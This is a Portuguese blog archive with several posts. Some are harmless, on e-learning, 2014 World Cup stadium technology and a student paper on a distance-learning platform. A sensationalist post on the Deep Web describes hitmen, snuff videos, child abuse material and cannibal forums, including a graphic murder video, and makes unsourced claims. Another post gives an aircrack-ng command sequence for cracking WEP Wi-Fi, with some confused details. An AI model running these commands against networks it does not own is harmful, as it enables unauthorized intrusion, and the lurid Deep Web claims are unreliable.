terça-feira, 21 de maio de 2013

O que é Deep Web

Deep Web (também chamada de Deepnet, Web Invisível, Undernet ou Web oculta) se refere ao conteúdo da World Wide Web que não faz parte da Surface Web, a qual é indexada pelos mecanismos de busca padrão.
Não deve ser confundida com a dark Internet, na qual os computadores não podem mais ser alcançados via Internet, ou com a Darknet, rede de compartilhamento de arquivos.

Mike Bergman, fundador da BrightPlanet e autor da expressão , afirmou que a busca na Internet atualmente pode ser comparada com o arrastar de uma rede na superfície do oceano: pode-se pescar um peixe grande, mas há uma grande quantidade de informação que está no fundo, e, portanto, faltando. podemos entender que a deep web é uma parte que não vemos, uma parte obscura da internet onde nao podemos "enxergar".



Tamanho 

Estimativas baseadas em extrapolações de um estudo feito na Universidade da Califórnia em Berkeley em 20013 especularam que a Deep Web possui 7.500 terabytes de informação. Estimativas feitas por He et al.4 , em 2004, detectaram cerca de 300.000 sites da deep web e, de acordo com Shestakov, cerca de 14.000 destes eram da parte russa da Web em 2006.5 Em 2008, a web chamada “Deep Web”, não referenciada pelos motores de busca representa 70 a 75% do total, ou seja, cerca de um trilhão de páginas não indexadas.

Os segredos do Deep Web

Todo mundo vive falando dessa misteriosa parte da internet, onde criminosos vendem assassinatos, a pedofilia é coisa comum, onde vírus podem ser achados e drogas compradas com bitcoin (a moeda da internet). Vendo todas as afirmações e questionamentos sobre os mistérios da Deep Web, o Minilua resolveu visitá-la e ver se tudo que falam é verdade:

Só para VIPs

Os endereços da Deep Web podem ser bem bizarros, como uma sucessão de letras e números seguida do sufixo .onion, em vez do tradicional .com. Originalmente, sua função é positiva: proteger conteúdos confidenciais, como os de governos, bancos, empresas, forças militares e universidades, acessíveis só com login, por exemplo

Ponto Cego

A Deep Web pode ficar dentro de sites comuns (na forma de arquivos e dados baixáveis) ou escondida em endereços excluídos de propósito dos mecanismos de busca. O Google nem faz ideia do que está lá: ele seria como um barco .pesqueiro que só localiza suas presas na “superfície” do mar

Zona de Guerra

Nem pense em se aventurar nesses mares. Eles estão cheios de crackers (hackers com intenções criminais), que adoram “fisgar” usuários descuidados. Como não há filtros de segurança, eles facilmente conseguem, por exemplo, “zumbificar” o computador de um internauta (controlando-o a distância sem que o dono note) e roubar dados

Predadores Abissais

A parte podre tem até nome: Dark Web. Lá se encontra de tudo: lojas virtuais de drogas, pornografia infantil e conexões terroristas para venda de armas. Como tudo fica nas profundezas, não há jeito de governos e a polícia tirarem do ar. É como seos sites tivessem vida própria, sem donos, registros e documentação

Confira, SE VOCÊ É UM DESSES CURIOSOS QUE PRETENDEM ENTRAR NA DEEPWEB EM BUSCA DA ESCÓRIA HUMANA. Do contrário, vá ler outro post do Ah Duvido, é o melhor que você faz! Ser ignorante em relação à essas questões é uma benção. Conhecer essas atrocidades que o humano pode fazer em troca de prazer doentio ou dinheiro é revoltante demais:

GRUPOS EXTERMISTAS:



Grupos extremistas já existem na Surface, o que muda para Deep é o número e a forma como agem. Na DeepWeb, os extremistas que disseminam todo tipo de preconceito, na maioria das vezes, optam por fóruns bloqueados, nos quais o usuários passa por diversos testes para entrar. Há crackers atuando junto com esses grupos e pode ter certeza que a sua vida vai ser vasculhada por inteiro antes de você por os olhos no que está escrito em algum desses fóruns.

Existe também os mais amadores. Esses não tem cuidado algum, porém, não deixam de serem violentos. Reúnem membros para marcarem ataques às suas vítimas, mostram imagens dos seus feitos – como, por exemplo, vídeos de grupos atacando judeus nas ruas –  apresentam teses sem pés nem cabeça sobre o porquê o seu preconceito deve ser alimentado, recrutam pessoal e fazem iniciações desses recrutados. Sorte nossa que a Polícia Federal e toda a polícia internacional fica de olho nesses camaradas e cada vez mais eles param na cadeia.

Hitman’s - Assassinos Contratados


Sicários brotam por todos os cantos da DeepWeb. Encontrá-los não é uma tarefa fácil mas o fato é que existem muitos e oferecendo os mais variados serviços. A maior parte é da Europa Central e Ásia e tem seus preços definidos por méritos e alvo. Méritos é referente aos alvos já executados com sucesso, ou seja, quanto mais alvos executados, maior a confiabilidade e consequentemente, o preço.  A outra classificação de preço é o tipo de alvo. Normalmente, pessoas comuns são as mais baratas. O preço aumenta com a posição da pessoa diante a sociedade e dificuldade para executar o alvo. Quanto maior a fama e contato com o público ou a dificuldade de eliminar o alvo, maior o preço. Por exemplo, um político tem uma vida pública bastante ativa, desse modo, será mais caro. Já um militar tem treinamento com armas e pode apresentar riscos para o assassino, logo, também é mais caro.

Videos Snuffs


Se você procura esse tipo de vídeo na Internet, siga meu conselho, vá atrás de ajuda. Pessoas normais, em sã consciência e sensatas não querem assistir essa escrotice, elas sente raiva disso! “Vídeos Snuffs” é o termo utilizado para à filmagens de assassinatos, aonde em homicídios pré-meditados, o assassino filma seu crime. Comumente são atos de extrema brutalidade e violência.

Esse tipo de filme aparecem aos montes pela Deep. Existem fóruns de pessoas que compartilham vídeos de assassinatos, é uma babaquice, uma ignorância, uma nojeira sem tamanho! Felizmente, me deparei pouco com esse material nas minhas andanças pela DW.

Já tive a infelicidade de clicar em link e me deparar com “3 Guys and 1 hammer” (maníacos de Dnepropetrovsk) e até hoje lembro e sinto muita raiva por não poder fazer justiça com as próprias mãos. O vídeo é revoltante! As gravações que surgiram na Deep no final de Julho de 2007, automaticamente foram trazidas para a Surface. Nele, Viktor Sayenko e Igor Suprunyuck, durante cerca de sete minutos inferem repetidas marteladas na cabeça de um idoso, e posteriormente perfuram com uma chave de fenda. Os dois foram capturados e condenados à prisão perpetua em 2009, o que particularmente acho pouco!

Há inúmeros casos semelhantes circulando pela Deep, tal como o pornô italiano aonde as mulheres são escalpadas e depois despedaçadas ainda vivas, mas sinceramente, sou da opinião que se você é babaca o suficiente para ficar procurando essas merdas de livre e espontânea vontade, você é cúmplice do crime! Sem telespectador não existiriam esses vídeos, essa é a verdade. Se não há ninguém assistindo, não há porque alguém produzir.

Como a Deep é uma terra sem lei, mesmo em fóruns, sites de diretórios, entre outros, que não tem nada a ver com o assunto, esses vídeos aparecem e se você não tiver estômago forte, vai perder o sono e a esperança na Humanidade! É algo que você vê e não consegue esquecer e, com certeza, é traumatizante para a maior parte das pessoas que ainda são humanos, pois quem assiste à tanta brutalidade e não sente nada é porque já perdeu a Humanidade.


Pornografia Grotesca


Todo tipo de pornografia rola na Deep. É uma bizarrice pior que à outra, tão bestial e repugnante que faria até o Marquês de Sade parecer um amador! O pior entre elas, sem dúvida, é as Child Porn, famosa pedofilia, que tem aos montes e revoltam – nota: eu queria ganhar na Mega da Virada para poder comprar uma armadura e uma katana e sair pelo mundo caçando esses lixos pedófilos!  Sério, acho que um policial federal tem que ter muito autocontrole quando encontra com gente assim.

As imagens as quais você se depara na Deep são de vomitar. Certa vez, em um desses fóruns de discussões gerais que frequento, um membro abriu um tópico chamado “Challenge”. Dentro tinha apenas um link. O link leva para um site, sem qualquer estrutura, apenas uma lista de diretórios. Em 5 minutos o tópico tinha mais de 200 comentários com xingamentos e ameaças ao usuário. Tinha gente que disse que iria descobrir aonde o usuário morava, mesmo que isso custasse todas as economias dele. Tinha cracker que falou que passaria noites e dias em cima do computador para rastrear a origem do site e que mandaria direto para o governo. E tudo isso porque, segundo o que falaram, dentro de um diretório chamado “Yellow Pumpkin” havia centenas de imagens de Child Porn da pior espécie, tanto que alguns usuários queriam juntar forças para encontrar o autor do site.  Por sorte, não vi, todavia, quem viu disse que eram imagens que você não esquece nem se perder a memória. Foi tão chocante para maioria das pessoas que algumas disseram que precisariam de tratamento psicológico depois de ver aquilo. Esses é um dos meus receios da Deep: você está lá na boa, curtindo um papo cabeça com membros de um fórum aparentemente inocente, de repente, do nada, aparece um infeliz e publica algo assim. Se você não estiver atento, clica e termina traumatizado. Por isso fica a dica: deepeiro de primeira viagem, não busque o que não deve e não clique em nada duvidoso e se clicar em um link com redirecionador, saia rapidamente do site, se não conseguir, desligue o computador antes que você possa ver qualquer coisa!


Experimentos “Científicos” com Humanos


Tempos atrás, o diretor doente mental Tom Six, lançou o filme Centopeia Humana. O filme conta a história de um médico alemão que sequestra três turistas e os une cirurgicamente, boca ligada ao ânus, formando uma centopeia humana. Com o sucesso da operação, o médico começa a treinar a centopeia, enquanto tenta escondê-la do resto do mundo. Para muitos, um dos filmes mais perturbadores já inventado.

Apesar dos pesares, é só um filme. Ninguém seria capaz de fazer algo assim, seria? Sim, seria! A DeepWeb vem provar que “Centopeia Humana” comparado aos experimentos feitos na realidade por um grupos de lunáticos é um especial do Telettubies dos dias da criança. Nos becos escuros das camadas mais pesadas, existem fóruns de compartilhamento de documentos e imagens sobre experimentos realizados com humanos, dos mais variados tipos. A maioria deles sem qualquer sentido, como emparedar humanos com besouros-tigres e constatar quantos dias ele resiste ou substituir as pernas dos humanos por patas de cabras.

A maioria desses sites descobertos – geralmente por hackers do bem que tentam acabar, ainda que ineficientemente, com essa escória que infesta a DW – alegavam que “somente utilizavam mendigos” como cobaias, como se isso diminuísse a culpa ou a atrocidade cometida. Os responsáveis são grupos ou mesmo pessoas ligadas à Ciência – como médicos, químicos, biólogos – que agem separadamente e se reúnem nesses fóruns secretos. Segundo os crackers mais determinados em localizar esses “lixos humanos”, grande parte desses sites são do Leste Europeu e atuam sempre sob gigantesca vigilância, sendo que tudo é automaticamente apagado quando o menor indício de que alguém de fora descobriu, demonstrando uma rede muito bem estruturada e um grande investimento por detrás dessas ações hediondas. Provavelmente são pessoas com muita grana que estão envolvidas nesses crimes.


Fóruns de Canibalismo.



Em 2003 um caso chocou a Alemanha e foi noticia no mundo todo. Um canibal confessou em um tribunal ter matado e comido uma pessoa a pedido da própria vítima. O “Canibal de Rotenburg”, como ficou conhecido, diz ter conhecido a vítima e combinado como tudo seria feito através da internet. Uma investigação da policia levou a uma rede de fóruns de canibalismo escondidos na DeepWeb. “Cannibal Cafe”, “Guy Cannibals” e “Torturenet” eram páginas usadas pelos canibais para marcar encontros e selecionar vítimas para a prática de canibalismo.

Nesses fóruns rolava de tudo, desde fotos e testemunhos de canibais até receitas para o bom preparo da carne humana. Mas o pior, certamente, eram os voluntários. Isso mesmo, tinha gente que se inscrevia para ser “comida” literalmente. Alguns, não por inteiro, apenas certas partes do corpo. Outros, todavia, viravam o prato do dia. Não, não tente entender, a idiotice humana desconhece limites. Quando você pensa que já viu de tudo, eis que aparece a DeepWeb.

Se você gostou sobre esse post e quer saber mais sobre a Deep Web e todos os seus segredo é só postar seu comentário aqui no blog.

domingo, 28 de abril de 2013

Técnicas de Segurança em Redes Wireless
"Como invadir rede sem-fio baseadas em criptografia WEP"

Alguns conceitos e definições:

Uma rede sem fio (Wireless) é um sistema que interliga vários equipamentos fixos ou móveis utilizando o ar como meio de transmissão. É semelhante a uma rede local com fio convencional (que segue o padrão IEEE 802.3), com exceção de que a rede sem fio usa ondas de rádio, em vez de cabos.


Ponto de acesso (PA) – Receptor Wi-Fi que se comunica com adaptadores Wi-Fi e dá acesso à internet. Em casa, é preciso ligar a conexão em alta velocidade ao ponto de acesso para usar uma rede sem fio. Access point (AP), em inglês.

SSID – Acrônimo de Service Set Identifier. Identifica os pontos de acesso em uma rede Wi-Fi e diferencia uma rede wireless de outra.

BSSID – Acrônimo de Basic Service Set Identifier ou Identificador exclusivo de cada cliente sem fio numa rede sem fio. O BSSID é o endereço MAC Ethernet de cada adaptador da rede.

802.11a – Variante Wi-Fi que opera na freqüência de 5 GHz e atinge velocidade de 54 Mbps (megabits por segundo). É incompatível com as redes 802.11b.

802.11b – Padrão original de redes sem fio definido pelo IEEE. É o mais lento de todos, com transmissão de 11 megabits por
segundo. Adaptadores compatíveis com 802.11b dão acesso a hotspots públicos.

802.11g – Padrão Wi-Fi com velocidade similar ao 802.11a (54 Mbps). É compatível com redes 802.11b.


802.11i – Atualização de segurança do padrão 802.11. Conta com o novo protocolo AES (Advanced Encryption System), que oferece maior proteção que o WPA.

802.11n – Grupo do comitê IEEE 802.11 que trabalha na definição de um padrão com taxa de transferência em redes sem fio de pelo menos 100 Mbps, mas com o objetivo de atingir até 540 Mpbs. O plano do grupo é ratificar o padrão em 2007.

802.16 – (WiMax) Protocolo para redes sem fio 802.16 que vai conectar, em uma primeira fase, áreas metropolitanas com alcance de até 50 quilômetros.


Criptografia – A arte de “escrever” em códigos. Utilizada na informática para garantir o sigilo das comunicações de dados.

Wi-Fi – Abreviação para “wireless fidelity”, que denota qualquer tipo de rede sem fios que utilize tecnologia 802.11.

WEP – Sigla de Wired Equivalency Privacy, protocolo de segurança que criptografa os dados enviados e recebidos em uma conexão sem fios. Não é muito seguro e tem como alternativa o WPA.

WPA – Acrônimo de Wi-Fi Protected Access. É um protocolo de segurança com recursos adicionais de criptografia de informações e autenticação de usuários para redes sem fio. É mais seguro que o WEP.


Demonstração prática do ARP Replay Attack contra redes sem fio que utilizam criptografia WEP.

A distribuição que será utilizada para a demonstração é o Debian, onde poderá ser feita em qualquer distribuição tendo os pacotes RPM instalado.

Os pacotes serão esses:

$ sudo apt-get install aircrack-ng
$ sudo apt-get install kismet


Instalar o driver nativo da sua placa de rede e garantir que o “modo monitor” possa ser habilitado.


$ sudo airmon-ng start wlan0
$ sudo airodump-ng -c 1 --bssid
08:10:74:3E:94:04 -w dumpfile mon0
$ sudo aireplay-ng -1 5 -a
08:10:74:3E:94:04 mon0
$ sudo aireplay-ng -3 -b
08:10:74:3E:94:04 mon0
$ sudo aircrack-ng dumpfile-01.cap

Após instalar o driver, é só "snnifar" a rede para saber quais conexões estão dentro de uma área de 50m, para poder realizar a invasão. Podendo utilizar o comando route print, para realização do mapa de roteamento das redes que estão conectadas e nas mesmas que estão na distância de 50m.

Podendo utilizar o site https://www.cloudcracker.com/ para poder descriptografar as senhas a partir do SSID da rede.

Texto de Allan Garcia
Editado por Bergh Nunes



quarta-feira, 16 de janeiro de 2013

E-Learning: Ensino do próximo milênio


Imagine que você seja o responsável pelo setor de treinamento em uma grande empresa e, numa bela e ensolarada tarde de sexta-feira, o seu chefe lhe apareça a porta, com um singelo pedido: “Estamos lançando um novo produto no mercado e temos que treinar todos os nossos vendedores sobre as características, performance, atributos e utilização desse novo produto no prazo de dez dias”. Para tornar a coisa mais divertida, sua empresa tem alguns milhares de vendedores dispersos por todo o território nacional, desde Manaus até Porto Alegre, sendo que a sede da empresa é logo ali na Praia do Botafogo, no Rio de Janeiro; o seu orçamento para viagens e despesas com instrutores “está no osso” e, além disso; o pessoal de Finanças acha um absurdo interromper o fluxo de receita proveniente das vendas só para os vendedores assistirem cursos no Rio. 

Guardadas as proporções, este é um desafio relativamente comum para as empresas em um mercado globalizado, competitivo e em constante mutação: agregar conhecimento aos funcionários de forma extremamente rápida, eficiente e de baixo custo. É ai que entra o e-learning, o uso da Internet na propagação de conhecimento.

O que é e-learning?

Tecnicamente, o e-learning é o ensino realizado através de meios eletrônicos. É basicamente um sistema hospedado no servidor da empresa que vai transmitir, através da Internet ou Intranet, informações e instruções aos alunos visando agregar conhecimento especifico. O sistema pode substituir total ou parcialmente, o que é mais comum, o instrutor, na condução do processo de ensino. No e-learning, as etapas de ensino são pré-programadas, divididas em módulos e são utilizados diversos recursos como o e-mail, textos e imagens digitalizadas, sala de bate-papo, links para fontes externas de informações, vídeos e teleconferências, entre outras. O treinamento com o e-learning pode ser montado pela própria empresa ou por qualquer dos fornecedores desse tipo de solução já existentes no mercado. 

Vantagens do e-learning.

Quais as vantagens! A primeira vantagem do e-learning, e que serviu como exemplo no inicio desse artigo, é o rompimento de barreiras geográficas e temporais. Com o e-learning, um curso sobre um novo produto, por exemplo, pode ser feito de qualquer local do planeta a qualquer momento, bastando para isso o acesso a Internet e uma senha. Enquanto, espera ser atendido pelo comprador, o seu vendedor pode puxar o lap-top e ler o texto sugerido no curso; em casa, enquanto seu companheiro(a) perde tempo assistindo Big Brother, o vendedor pode fazer os exercícios propostos pelo instrutor.  Em síntese, o e-learning possibilita ao aluno gerenciar o seu próprio tempo disponível, dentro dos parâmetros estabelecidos pelo curso, e sem perder tempo com deslocamentos. 




O e-learning pode ser disponível em qualquer dispositivo móvel, tablets, smartphones, etc, tendo suporte para vídeo e audio, pode ser utilizando normalmente.

Outra vantagem do e-learning está relacionada a reprodução do conteúdo. Uma vez montado o curso para um aluno, a sua reprodução para dois, centenas, ou milhares de alunos pode ser feita a um custo marginal insignificante. Com um curso tradicional, o máximo que se consegue é montar turmas de alunos, até se completar todo o universo que se pretenda atingir numa escala crescente de custos, energia e tempo dispendido.  Evidentemente, isso sugere que, para poucos alunos, talvez um treinamento convencional seja a solução mais adequada que o e-learning. Por outro lado, pensando em termos de políticas públicas de ensino, onde o universo se mede não em milhares, mas em milhões de candidatos à instrução, é possível que o e-learning, venha a representar uma verdadeira revolução na geração de conhecimento.

É importante ressaltar, que o e-learning não veio para substituir o ensino tradicional, da mesma forma que a Internet, não substitui a TV que, por sua vez, não fez desaparecer o rádio. O e-learning é uma nova ferramenta potencializada pela Internet e perfeitamente ajustada às características de nosso tempo, marcado pela agilidade, velocidade e gigantescos volumes de informação a serem digeridos. No que se refere às empresas, o objetivo não deve ser simplesmente substituir a forma de ensino tradicional pelo e-learning, mas sim, utilizar essa ferramenta na medida adequada às suas necessidades. De tal forma que os objetivos da organização sejam plenamente atingidos.

Fonte: http://www.e-commerce.org.br/artigos/e-learning_ensino.php

Texto de Dailton Felipini
Edição de Bergh Nunes

terça-feira, 1 de janeiro de 2013


Tecnologia será o diferencial nos estádios de 2014
Integração de áudio, vídeo e dados pode ampliar uso das arenas, diz especialista

A Copa de 2014 deverá transformar os velhos estádios brasileiros em modernas arenas no padrão Fifa, confortáveis, cobertas e dotadas de áreas especiais para convidados e também para eventos culturais, de negócios, religiosos, além do futebol e de outros esportes. A previsão vale para os 12 estádios que receberão os jogos de 2014, mas também para dezenas de novos equipamentos esportivos em projeto e construção em várias cidades do país, como Recife, Aracaju  Florianópolis, Belém, Vitória, Campinas, São Paulo, Natal e Rio de Janeiro, entre várias outras localidades.

Mais do que construções imponentes, as novas arenas deverão ser espaços multimídia, dotadas dos mais avançados sistemas de som e imagem, além de dados e recursos de telefonia. Essa é a tendência mundial apontada por Alexandre Novakoski, diretor da Seal Telecom, empresa especializada em soluções de automação e interatividade para ambientes como estádios, aeroportos, metrôs, hotéis e teatros.


Ele acredita que, em termos de novidades, o que veremos não deve diferir tanto do que se viu no evento da África do Sul, que já trazia grandes avanços tecnológicos. O que já seria muito, considerando a infraestrutura atual dos estádios nacionais. A expectativa é por estádios confortáveis, seguros, equipados com sistemas que garantam som claro, boa iluminação, além de mais tecnologia, como o uso de ingressos marcados com "digital signage", a exemplo do que já existe lá fora. Novakoski avalia que "além de ser exigência da Fifa, uma nova infraestrutura para os estádios brasileiros é também - antes de mais nada - um anseio do próprio público", afirma.

3G será a tecnologia da Copa 2014

Apesar das expectativas em torno do 4G, as operadoras trabalham para reforçar a capilaridade da rede 3G - HSPA + - para suportar o tráfego de voz, dados, e especialmente, vídeo nos jogos do Brasil.

"Não tenho dúvida que a maior parte da demanda da Copa, que será excepcional, será demandada pelo 3G", sustentou Janilson da Silva Bezerra Junior, diretor de Inovação da TIM. Presidente da Telefónica/Vivo, Antonio Carlos Valente, não prevê problemas para a Copa das Confederações, mas pede agilidade do governo para 2014. Acompanhe na gravura abaixo a evolução dos sistemas de celulares para entender mais sobre essa tecnologia que já é uma tendência atual em nosso país.

O tema Copa do mundo e capacidade de atendimento ao público foi um dos que estiveram em pauta no IV Seminário de Telecomunicações, realizado na Fiesp, na capital paulista. Além de reforçarem o 3G, as operadoras também valorizaram o papel do Wi-Fi para atender, principalmente, o público que irá ao estádio. 

"O provimento de serviço para quem está trabalhando na Copa já está definida pela Fifa ( a Oi ganhou o contrato). O nosso desafio é atender quem está no estádio, quem quer roaming e mandar seu vídeo, seu MMS para seu país", disse Valente, da Telefónica/Vivo. 


Atender a demanda de 4G para a Copa das Confederações, em 2013, não será tarefa complicada. "São poucos estádios e a cobertura será centralizada, além disso, haverá poucos terminais disponíveis e o serviço será ainda de valor elevado. O nosso desafio é aumentar o 3G e contornar o problema das antenas para as metas de 2014", destacou ainda o executivo.


Na imagem abaixo temos algumas empresas que irão oferecer na tecnologia 3G e 4G (dependendo da região) para todos os espectadores da Copa das Confederações de 2013 e Copa do Mundo de 2014.

Fonte:
http://convergenciadigital.uol.com.br/cgi/cgilua.exe/sys/start.htm?infoid=31915&sid=17
http://www.portal2014.org.br/noticias/6383/TECNOLOGIA+SERA+O+DIFERENCIAL+NOS+ESTADIOS+DE+2014.html



quarta-feira, 26 de dezembro de 2012


MSEduc: Master Student Education


Wandembergh Nunes1, Juliana Urquisa1, Luiz Geraldo dos Santos1
1FASE – Faculdade Santa Emília
Av. José Augusto Moreira, 1572 - Olinda – PE – Brazil – CEP:53130-410
{bergh.nunes, julianaurquisa2012, lgsantos50} @gmail.com

Apresentação: Esse artigo foi descrito para um projeto de educação à distância, para a área de desenvolvimento por três estudantes de Sistemas de Informação da Faculdade Santa Emília (FASE) localizada no município de Olinda, estado de Pernambuco, Brasil.

Resumo. Este artigo descreve o projeto MSEduc de Educação Digital e suas potencialidades no atual cenário educacional brasileiro. A educação à distância representa um grande passo para a democratização do conhecimento, criando oportunidades de acesso ao ensino, antes inexistentes, e agora, de forma mais fácil e mais rápida. O MSEduc se insere neste contexto: uma plataforma WEB para educação à distância, que prioriza a educação e a qualificação profissional para os alunos das camadas sociais de baixo poder aquisitivo. Se propõe ainda, a ser uma ferramenta de auxilio aos profissionais de ensino para a elaboração de aulas e conteúdo programático em diversas disciplinas.

Palavras-chave: educação a distância.

INTRODUÇÃO

A Educação a Distância (EAD) é a modalidade educacional na qual a mediação didático-pedagógica nos processos de ensino e aprendizagem ocorre com a utilização de meios e tecnologias de informação e comunicação, com estudantes e professores desenvolvendo atividades educativas em lugares ou tempos diversos, podendo apresentar ou não, momentos presenciais. Essa definição está presente no Decreto 5.622, de 19.12.2005 (que revoga o Decreto 2.494/98), que regulamenta o Art. 80 da Lei 9394/96 (LDB).[1][2] Esta modalidade de educação contrasta-se, portanto, com a modalidade de educação presencial, que é a modalidade mais comumente utilizada nos cursos regulares, onde professores e alunos encontram-se sempre em um mesmo local físico, denominado de sala de aula, e ao mesmo tempo.
A história da educação a distância pode ser rastreada até o início da nossa era cristã. Segundo Golvêa & Oliveira (2006)[2], alguns compêndios citam as epístolas do apóstolo Paulo às comunidades cristãs da Ásia Menor, registradas na Bíblia, como a origem histórica da Educação a Distância. Estas epístolas ensinavam como viver dentro das doutrinas cristãs em ambientes desfavoráveis e teriam sido enviadas por volta de meados do século I. Ao longo história outros marcos históricos podem ser encontrados e que contribuíram para consolidar a EAD no mundo.
A  Suécia  registrou sua primeira experiência em 1833, com um curso de Contabilidade. Na mesma época, fundou-se na Alemanha em 1856 o primeiro instituto de ensino de línguas por correspondência. [4] 
No Brasil, é provável que  as primeiras experiências em Educação a Distância tenham ficado sem registro, visto que os primeiros dados conhecidos são do século XX.
Maia & Mattar, (2007); Marconcin, (2010); Rodrigues, (2010); Santos, (2010)[2], citam o Jornal do Brasil, que em 1904 registra na primeira edição da seção de classificados, anúncio que oferece profissionalização por correspondência para datilógrafo
Contudo, somente nas últimas décadas, a EAD passou a fazer parte das atenções pedagógicas. Ela surgiu da necessidade do preparo profissional e cultural de milhões de pessoas que, por vários motivos, não podiam frequentar um estabelecimento de ensino presencial, e evoluiu com as tecnologias disponíveis em cada momento histórico, as quais influenciam o ambiente educativo e a sociedade.[2]

Vantagens da EAD
A Educação a Distância constitui um recurso de incalculável importância para atender grandes contingentes de alunos, de forma mais efetiva que outras modalidades e sem riscos de reduzir a qualidade dos serviços oferecidos em decorrência da ampliação da clientela atendida. Isso é possibilitado pelas novas tecnologias nas áreas de informação e comunicação que estão abrindo novas possibilidades para os processos de ensino-aprendizagem a distância. Novas abordagens têm surgido em decorrência da utilização crescente de multimídias e ferramentas de interação a distância no processo de produção
de cursos, pois com o avanço das mídias digitais e da expansão da Internet, torna-se possível o acesso a um grande número de informações, permitindo a interação e a colaboração entre pessoas distantes geograficamente ou inseridas em contextos diferenciados.[3]
Somando-se a isso, a metodologia da Educação a Distância possui uma elevância social muito importante na democratização do ensino, pois permite o acesso ao sistema àqueles que vêm sendo excluídos do processo educacional superior público por morarem longe das universidades, por indisponibilidade de tempo nos horários tradicionais de aula, ou devido dificuldades finaceiras, uma vez que a modalidade de Educação a Distância contribui para a formação de profissionais sem deslocá-los de seus municípios e a um custo menor.[2]
A crescente demanda por educação, devido não somente à expansão populacional como, sobretudo às lutas das classes trabalhadoras por acesso à educação, ao saber socialmente produzido, concomitantemente com a evolução dos conhecimentos científicos e tecnológicos está exigindo mudanças em nível da função e da estrutura da escola e da universidade [PRETI, 1996]. Nesse contexto, a Educação a Distância torna--se um instrumento fundamental de promoção de oportunidades, visto que muitos indivíduos, apropriando-se deste tipo de ensino, podem concluir um curso superior de qualidade e abraçar novas oportunidades profissionais. [2][5]
Podemos citar ainda:
  • Autonomia na aprendizagem, pois requer mais comprometimento do aluno, o que permite que haja um maior desenvolvimento;
  • A qualidade do material de ensino é de alta qualidade;
  • Incentiva a educação permanente;
  • Comunicação bidirecional e massiva. As salas de aula online também facilitam o aprendizado em equipe, fornecendo salas de bate-papo e grupos de discussão para a realização de reuniões e trabalhos conjuntos.
  • Permite maior disponibilidade e ritmos de estudo diferenciados;
  • Maior familiarização com as mais diversas tecnologias;
  • O material do curso está disponível 24 horas por dia, 7 dias por semana. Os participantes têm a possibilidade de ler e reler aulas, debates, explicações e comentários. Muitas vezes, o material falado numa sala de aula tradicional não é assimilado pelos alunos devido a uma série de distrações, aulas perdidas, velocidade na qual o assunto é ministrado, cansaço ou tédio;
  • O material de ensino é mais facilmente atualizável; e
  • Os instrutores online têm o conhecimento prático e podem estar em qualquer lugar do mundo. Isto permite que os estudantes sejam expostos a um conhecimento que não aprenderiam em livros e vejam como os conceitos de aula são aplicados em situações reais de negócio.
Desvantagens do EAD

  • Resistência por parte do ser humano à mudança e à aceitação do novo paradigma;
  • Se não houver equipamento ou se o uso deste for inadequado, pode ocorrer falhas no processo de ensino-aprendizagem
  • O conteúdo é trabalhado por vários profissionais até chegar ao cliente final o "aluno", o que implica em maior risco de não-eficácia e a relação professor x aluno é bastante diferente da relação em aulas presenciais.


 OS OBJETIVOS DA FERRAMENTA MSEduc

O que é o MSEduc de Educação Digital
É um projeto educacional que visa à qualificação e profissionalização de pessoas de baixo poder aquisitivo e alunos da rede pública e municipal de ensino, possibilitando que  através do conhecimento e habilidades adquiridas, tenham melhores oportunidades para se inserir no mercado de trabalho.

O Porque do projeto MSEduc de Educação Digital
Vimos que há uma grande dificuldade na assimilação dos assuntos abordados em aula, principalmente no ensino público, a falta de fixação das disciplinas mais complexas como Matemática, Física  Química, e entre outras, passou a ser um grande obstáculo para todos que compõe esse nicho. Então o MSEduc veio para forma de facilitar isso, de forma mais interativa e dinâmica, fazendo com que o aluno ter mais interesse em estudar e aprender sempre mais, utilizando recursos tecnológicas bastante interativas para acessar todo o contéudo da plataforma.
O projeto além de oferecer a plataforma de conteúdos através da sua website, através de ambiente dinâmico e atrativo, aqueles que não tem acesso à Internet em sua residência, o projeto se encarrega de entregar todo o conteúdo através de fascículos e vídeo-aulas para serem passadas em aparelhos de DVD, isso facilitando para os alunos que não tem condições de acessar a Internet em sua casa.

ARQUITETURA E IMPLEMENTAÇÃO
O MSEduc foi desenvolvido utilizando uma arquitetura com base no padrão MVC, dividido em três camadas (persistência, negócio e interface), proporcionando uma melhor flexibilidade nos dados e nas informações que estão sendo visualizadas. A representação da arquitetura do MSEduc é apresentada na Figura 1.


A camada superior, que a camada de View/Interface, que nada mais é a camada responsável pela interface do site, onde estão justamente todos os elementos visuais. Onde a aplicação foi desenvolvida utilizando HTML5 e CSS3, dando uma melhor aparências nos menus, banner principal e toda a estrutura da página. O banner principal foi utilizada as bibliotecas Jquery (JavaScrtipt, AJAX e CSS), utilizando linhas de códigos sequenciais, para a passagem das imagens.[6]
A segunda camada, que é a camada de Negócio/Controller, tem a função de interceptar as requisições HTTP realizadas através do browser, executar regras de negócio e encaminhar para outra tela do sistema. Essa interceptação acontece através da linguagem PHP a interação com a camada de persistência, que iremos relatar logo adiante. Na tela de login e senha, iremos realizar uma validação através da linguagem JavaScript utilizando as bibliotecas de implementação chamada Spry, ele intercepta logar na página, caso o login e a senha não serem digitados, para validação de login e senha foi utilizando o JavaScript e o PHP para acessar o painel administrativo, caso o login e senha for realmente correto, então será logado para a outra tela.
Mais abaixo, temos a camada de persistência ou Model, cuja a finalidade é gravar, ou recuperar informações no ambiente (Bando de Dados, Arquivos, etc). Nessa camada estão os arquivos de dados de acesso do objeto (DAO), que são arquivos que são responsáveis de interagir com a linguagem SQL, junto com o ODBC (Open Data Base Conectivity) que é um padrão de acesso do banco, utilizando o framework ZendPHP para a realização de atividades de persistência.[6]
Por fim temos o banco de dados MySQL 5.5 que foi o ambiente escolhido para realizar a persistência dos dados da aplicação. O MySQL é gratuito e grande escalabilidade.
A arquitetura de Hardware é totalmente baseada em computação das nuvens através do serviço de hospedagem, em virtude do baixo custo, com alto desempenho, tendo acesso em qualquer lugar através do browser, tolerância à falhas e facilidade de gerenciamento do próprio conteúdo, tendo em vista a facilidade desse gerenciamento, de início, foi escolhido os serviços de hospedagem e de servidores virtuais da WebInterativa, que permite a infraestrutura de hardware sobre demanda, através de servidores virtuais, servidores de backup, gerenciador de conteúdo bastante intuitivo.
O critério para a utilização dessa escolha da infraestrutura de hardware, foi definido de acordo com os requisitos funcionais e não funcionais do software, onde analisando com mais detalhamento os seguintes critérios:
  • Alta disponibilidade (99,9%)  - Por ser um sistema hospedado na Web, todos podemos ter acesso ao mesmo e acessar as opções da website ou do próprio sistema.
